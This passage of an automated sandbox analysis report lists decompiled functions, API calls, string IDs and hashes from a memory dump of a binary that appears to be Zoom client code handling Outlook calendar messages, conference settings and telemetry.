                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: B64String$com.Zoom.app.conf.updateLCP
                • API String ID: 3166440930-692587612
                • Opcode ID: 85f95ee4ad018b10356ab193765ed1b74f4dc042c4e710bf7e6161ab506c1b8f
                • Instruction ID: 033b427de1fa4575afe308cacd3a0d9e1d8cf688c1fcb09cc0fa8fe0c0cb4c54
                • Opcode Fuzzy Hash: 85f95ee4ad018b10356ab193765ed1b74f4dc042c4e710bf7e6161ab506c1b8f
                • Instruction Fuzzy Hash: 52E0D8F0A0078067C7307B115C85B1E66B4A750B55F840D2CB6056F3D1CBF54D44DB75
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74D37
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.enable.subscribe.presence,00002783,enable,00000004), ref: 00C74D52
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.conf.enable.subscribe.presence$enable
                • API String ID: 4281283084-3039794735
                • Opcode ID: c7b5bcff4848d898c9ab89a2b762202a547413b36baaff7e50c2b661a889456b
                • Instruction ID: bb7e7ac6e63c8c19544f61e341341f3a3a7f5c13375bd754c3d1132b187633f4
                • Opcode Fuzzy Hash: c7b5bcff4848d898c9ab89a2b762202a547413b36baaff7e50c2b661a889456b
                • Instruction Fuzzy Hash: 23E092B190478477D720AB259C89B1F22A4E751F19F94046CB1185A391CBF40940D7B8
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6CEC7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.audio.device.fail.notification,00009CC6,FailReason,00000004), ref: 00C6CEE2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: FailReason$com.zoom.app.assistant.sip.audio.device.fail.notification
                • API String ID: 4281283084-117400061
                • Opcode ID: 1e6eefb1c4c373c95014d429c150541994d0677ee942b2e86fd94f0aff77d542
                • Instruction ID: 0d99ed8215b8805ddc789af30a429c0e344dbfdfd87aae28445a69d4ef0efc39
                • Opcode Fuzzy Hash: 1e6eefb1c4c373c95014d429c150541994d0677ee942b2e86fd94f0aff77d542
                • Instruction Fuzzy Hash: ACE09AB0A04380A7D720BB108949B2E27A4AB40B1AF81047DB2046B382CBF84800E7B5
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EEB7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.network.device.refresh.request,00009DDC,deviceType,00000004), ref: 00C6EED2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.network.device.refresh.request$deviceType
                • API String ID: 4281283084-4076288596
                • Opcode ID: d908724bd628304deaef016e5d088620299c7ebfeab4287f863efd85a22b0e1a
                • Instruction ID: 91321f3c1559a9176e60f0f2474cf4d2eadb62e387bc36f3a071f78d9fe8ee9d
                • Opcode Fuzzy Hash: d908724bd628304deaef016e5d088620299c7ebfeab4287f863efd85a22b0e1a
                • Instruction Fuzzy Hash: CFE0D8B0640754ABC7207B154C8675F26E4BB50756F90096DF2455E3C2CBF44841DB74
                APIs
                • std::locale::_Init.LIBCPMT ref: 00CCADE3
                  • Part of subcall function 00CE2A64: __EH_prolog3.LIBCMT ref: 00CE2A6B
                  • Part of subcall function 00CE2A64: std::_Lockit::_Lockit.LIBCPMT ref: 00CE2A76
                  • Part of subcall function 00CE2A64: std::locale::_Setgloballocale.LIBCPMT ref: 00CE2A91
                  • Part of subcall function 00CE2A64: _Yarn.LIBCPMT ref: 00CE2AA7
                  • Part of subcall function 00CE2A64: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00D22C78,00000000,00000004,00C52106,00000001,00000000,00000000,00000004,00000000,00000000,?), ref: 00CE2AB9
                  • Part of subcall function 00CE2A64: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000004,00C52106,00000001,00000000,00000000,00000004,00000000,00000000,?), ref: 00CE2ADA
                  • Part of subcall function 00CE2A64: std::_Lockit::~_Lockit.LIBCPMT ref: 00CE2AE7
                  • Part of subcall function 00C59E72: __EH_prolog3.LIBCMT ref: 00C59E79
                  • Part of subcall function 00C59E72: std::_Lockit::_Lockit.LIBCPMT ref: 00C59E83
                  • Part of subcall function 00C59E72: int.LIBCPMT ref: 00C59E9A
                  • Part of subcall function 00C59E72: std::_Lockit::~_Lockit.LIBCPMT ref: 00C59EF4
                • std::locale::_Init.LIBCPMT ref: 00CCAE9C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Lockitstd::_$std::locale::_$Cmm@@H_prolog3InitLockit::_Lockit::~_State@Unlock@$SetgloballocaleYarn
                • String ID:
                • API String ID: 2569103634-0
                • Opcode ID: dd3b336a25e0a5780815011b88b251b37ee55bf4edeba44b406614756e55b1a1
                • Instruction ID: ab2bc70115a09c42a8f37fc070e1c256eff0f221adfd1aa768850cf6fe7e70d1
                • Opcode Fuzzy Hash: dd3b336a25e0a5780815011b88b251b37ee55bf4edeba44b406614756e55b1a1
                • Instruction Fuzzy Hash: 549146B1900205DFDB14CF54C498B9ABBF4FF09314F1481A9D8199B782D7BAAA58CFE1
                APIs
                • __EH_prolog3_catch.LIBCMT ref: 00C5A627
                • ??0?$CStringT@D@Cmm@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,00000018,00C557E3,?,00000000,?,00000000,000000FF,?,00000000,?,?,?,?,00000034), ref: 00C5A6AD
                • _Deallocate.LIBCONCRT ref: 00C5A6FE
                  • Part of subcall function 00C5C080: ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(?,00000000,?,?), ref: 00C5C0A0
                • Concurrency::cancel_current_task.LIBCPMT ref: 00C5A749
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@String$Concurrency::cancel_current_taskD@2@@std@@@D@std@@DeallocateE@$$H_prolog3_catchU?$char_traits@V01@@V?$allocator@V?$basic_string@
                • String ID:
                • API String ID: 33380148-0
                • Opcode ID: 76e2bb7ca543f16c038501a34495d64c340f3b24b35ce738eec20e08aa356c25
                • Instruction ID: 72a515da46c9366154e90d5f6ae25e10f0acb0d2fbab0d154fe3ffb186c94cc2
                • Opcode Fuzzy Hash: 76e2bb7ca543f16c038501a34495d64c340f3b24b35ce738eec20e08aa356c25
                • Instruction Fuzzy Hash: D9319235600605CFCB18DF69C48599EBBF6AF88341B34852EF885D7261EA70E984DB54
                APIs
                • ?Clear@XMLDocument@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000001,?,00000000,?,?,00CB25E7,00000000,?,?,?,00CB3FAB,?,00000001,00000000,000001C4,00CA5C1C), ref: 00CB2609
                  • Part of subcall function 00CB23B0: ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001,00000000,000001C8,00CA29E7,?,?), ref: 00CB23B4
                  • Part of subcall function 00CB23B0: ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?,00000000,?,00CA5CCC,?,000000FF,00000001), ref: 00CB23D5
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000005,00000000,00000000), ref: 00CB26B5
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Document@tinyxml2@@$Error@Error@2@$Children@Clear@DeleteNode@tinyxml2@@
                • String ID:
                • API String ID: 143973664-0
                • Opcode ID: 8a69f90f1d5590e15f8df46558ae4c412730f5ad23f737b7a6d8e6d3e3c76af1
                • Instruction ID: 8ada8a8e1328e888fc242c2e18ba4f9d6b7972d8c39ef53bf44a6ada15eb941d
                • Opcode Fuzzy Hash: 8a69f90f1d5590e15f8df46558ae4c412730f5ad23f737b7a6d8e6d3e3c76af1
                • Instruction Fuzzy Hash: 00210AB17406087AEB6876788CC7FFF629CDB61764F10462DF611962C1E6A49E012172
                APIs
                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,?,?), ref: 00CAC95D
                • GetLastError.KERNEL32(?,?,?), ref: 00CAC96C
                • PostQueuedCompletionStatus.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00C78290), ref: 00CAC992
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?), ref: 00CAC9DE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CompletionQueuedStatus$Cmm@@ErrorLastPostState@Unlock@
                • String ID:
                • API String ID: 4285990431-0
                • Opcode ID: 24b29648f5fd74c9aa87b6cec14bf5169d7a6e276da0cbd5f0da8ec8812d6531
                • Instruction ID: fd124fff984a9f0cd45404355adf907a3da87f20fc387e8d2480d2e0ccc80d81
                • Opcode Fuzzy Hash: 24b29648f5fd74c9aa87b6cec14bf5169d7a6e276da0cbd5f0da8ec8812d6531
                • Instruction Fuzzy Hash: 2E214175E0021AAF9F248FE9C4844EFFBB5EF5A355B10802AD515E3310D7306E45CBA1
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5C466
                  • Part of subcall function 00C5E9D5: __EH_prolog3_GS.LIBCMT ref: 00C5E9DC
                  • Part of subcall function 00C5E9D5: #21.MAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000070,00C5C4FE), ref: 00C5EA07
                  • Part of subcall function 00C5E9D5: #19.MAPI32(00000000,?,00000070,00C5C4FE,00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA21
                  • Part of subcall function 00C5E9D5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA45
                  • Part of subcall function 00C5E9D5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000101,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA6B
                  • Part of subcall function 00C5E9D5: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,00000000,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA97
                  • Part of subcall function 00C5E9D5: ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB01
                  • Part of subcall function 00C5E9D5: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB1A
                • ??0CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAE@XZ.RWSNDPQSKZ(00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5C51B
                  • Part of subcall function 00C5C830: __EH_prolog3.LIBCMT ref: 00C5C837
                  • Part of subcall function 00C5C830: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlook.on.get.default.profile.notify,00009E69,strDefaultProfile,count,00000004), ref: 00C5C855
                • ?SetItem1@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z.RWSNDPQSKZ(00D33368,00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5C52E
                  • Part of subcall function 00C5C660: __EH_prolog3.LIBCMT ref: 00C5C667
                • ??1?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@_K@Archive@Cmm@@UAE@XZ.RWSNDPQSKZ(00009E69,00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5C55C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$String$Archive@MessageState@Unlock@$Assign@?$Cmm@@_H_prolog3H_prolog3_Template_2@$??0?$??1?$Cmm@@@DefaultH00@Item1@?$Message_Notify@@OutlookProfileTemplate_1@W@3@@
                • String ID:
                • API String ID: 82125525-0
                • Opcode ID: a4a77b1fea53c146d4fe4ee2ac61aeb5cfad4f94054d3f4812242f9034587833
                • Instruction ID: b5ba00dff759fa4262978dff134a6430067211539f541939f6149a571fdb6745
                • Opcode Fuzzy Hash: a4a77b1fea53c146d4fe4ee2ac61aeb5cfad4f94054d3f4812242f9034587833
                • Instruction Fuzzy Hash: BD310DB4E003099FCB54DF68D58579DBBF4BF48711F10806AD858E7241EB70AA88DF55
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CC06BD
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000034,00CC0C35,?,?,?,?,?,?,?,00000020), ref: 00CC06DE
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00D3E0D0,?,00000034,00CC0C35,?,?,?,?,?,?,?,00000020), ref: 00CC0701
                • CLSIDFromString.OLE32(?,?,?,00000034,00CC0C35,?,?,?,?,?,?,?,00000020), ref: 00CC072C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$Cmm@@$??0?$Assign@?$FromH_prolog3_V01@@
                • String ID:
                • API String ID: 3182857555-0
                • Opcode ID: 1d28734758871d6838684d12807335306157729d95fa205e5b30b80757455930
                • Instruction ID: be09d0a1e4ca52314d53963e83684458927d9ee8f306d95fd2377e3d5e431fbc
                • Opcode Fuzzy Hash: 1d28734758871d6838684d12807335306157729d95fa205e5b30b80757455930
                • Instruction Fuzzy Hash: A931A235905284CFCF06CFA8D8905D9FFB0AE66301B1C8498EC946F247C6B09A49CB71
                APIs
                • __EH_prolog3.LIBCMT ref: 00CB4CD7
                  • Part of subcall function 00CA602C: __EH_prolog3.LIBCMT ref: 00CA6033
                  • Part of subcall function 00CA602C: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00D34CD0,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000004), ref: 00CA607A
                • GetTickCount.KERNEL32 ref: 00CB4D3C
                • ?GetTelemetryGUID@CCmmPerfTelemetry@@SAHAAV?$CStringT@_W@Cmm@@@Z.RWSNDPQSKZ(?,?,00000000,?), ref: 00CB4D7A
                  • Part of subcall function 00CB7C70: __EH_prolog3_GS.LIBCMT ref: 00CB7C77
                  • Part of subcall function 00CB7C70: ?UIntToString@Cmm@@YAXIAAV?$CStringT@_W@1@@Z.RWSNDPQSKZ(00000001,?,00000058,00CB5E51,?,0000001C,00CB4DB0,?), ref: 00CB7CAF
                  • Part of subcall function 00CB7C70: ??H?$CStringT@_W@Cmm@@QBE?AV01@PB_W@Z.RWSNDPQSKZ(00D3D264,00D3D264,00000058,00CB5E51,?,0000001C,00CB4DB0,?), ref: 00CB7CC4
                  • Part of subcall function 00CB7C70: ??H?$CStringT@_W@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,?,00000058,00CB5E51,?,0000001C,00CB4DB0,?), ref: 00CB7CD7
                • ?AddPerfTelemetryStartWStack@CCmmPerfTelemetry@@SAHUPerfMetricsEvents_s@ZoomPTPAAP@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@U?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_str@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_str@@V?$CStringT@D@Cmm@@@std@@@5@@std@@ABV?$map@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_JU?$less@W4e_chat_perfmetrics_Perfmetrics_event_tag_int@@@std@@V?$allocator@U?$pair@$$CBW4e_chat_perfmetrics_Perfmetrics_event_tag_int@@_J@std@@@3@@5@AAV?$CStringT@_W@Cmm@@_KH@Z.RWSNDPQSKZ(?), ref: 00CB4DAB
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$W4e_chat_perfmetrics_$Cmm@@$Perf$H_prolog3Perfmetrics_event_tag_int@@_Perfmetrics_event_tag_str@@TelemetryTelemetry@@U?$less@U?$pair@$$V01@V?$allocator@V?$map@$Assign@?$Cmm@@@Cmm@@@std@@@5@@std@@Cmm@@_CountEvents_s@H_prolog3_J@std@@@3@@5@MetricsPerfmetrics_event_tag_int@@@std@@Perfmetrics_event_tag_str@@@std@@Stack@StartString@TickV01@@W@1@@Zoom
                • String ID:
                • API String ID: 3001168285-0
                • Opcode ID: ff67d6b0bc739e27ec6bfda6342a3e56bb56fe16dc523528c6fa89f66adf03c5
                • Instruction ID: a0f980433942f434c63e627fd7497937b5966b992661eaf260e1f52511361f8c
                • Opcode Fuzzy Hash: ff67d6b0bc739e27ec6bfda6342a3e56bb56fe16dc523528c6fa89f66adf03c5
                • Instruction Fuzzy Hash: 7C315A7180474AEFCB10EFA4C945BEEBBF4BF14309F00451DE84597651DBB4AA88EBA1
                APIs
                • GetLastError.KERNEL32(00000000,00000000,00000000,00CFA820,00000000,?,00CFE290,?), ref: 00CFEBEE
                • _free.LIBCMT ref: 00CFEC4B
                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CFE290,?), ref: 00CFEC8C
                  • Part of subcall function 00D0003E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00CED4E1,?,00000001), ref: 00D00068
                • _free.LIBCMT ref: 00CFEC81
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorLast_free$Cmm@@State@Unlock@
                • String ID:
                • API String ID: 3494935338-0
                • Opcode ID: 3d5a9e32f921ff8d899f2226df04a74009fb69ca29c81917263f4784c87eceba
                • Instruction ID: cd7e2e85d47b1879f961707f8bcf3dde70e3ee1c9c8705cb060498415e483ead
                • Opcode Fuzzy Hash: 3d5a9e32f921ff8d899f2226df04a74009fb69ca29c81917263f4784c87eceba
                • Instruction Fuzzy Hash: 5411C6322007887AD6913775ACC5F3A2A5EDBC1774B354225F738C62F2DE358E41A172
                APIs
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(00000004,?,00000004,?,00CBCA53,0000004C,00000004,?,?,?,00CBBCCD,?,?,00000004,00000000,?), ref: 00CBCA9C
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(00000020,00000004,?,00000004,?,00CBCA53,0000004C,00000004,?,?,?,00CBBCCD,?,?,00000004,00000000), ref: 00CBCAA8
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(00000068,00000020,00000004,?,00000004,?,00CBCA53,0000004C,00000004,?,?,?,00CBBCCD,?,?,00000004), ref: 00CBCAF6
                • ??0?$CStringT@D@Cmm@@QAE@$$QAV01@@Z.RWSNDPQSKZ(000000B4,00000068,00000020,00000004,?,00000004,?,00CBCA53,0000004C,00000004,?,?,?,00CBBCCD), ref: 00CBCB98
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@E@$$StringV01@@
                • String ID:
                • API String ID: 2932468982-0
                • Opcode ID: 1b3ff19e92735463b8db33c8d59e3ba3f0555bb7e4eb5ce1313fb7f3e3a76123
                • Instruction ID: 9f959d5e1ba1239c87f2c3a279e52d93e6d7d5a102816c15eb4bc0d4c4d675ee
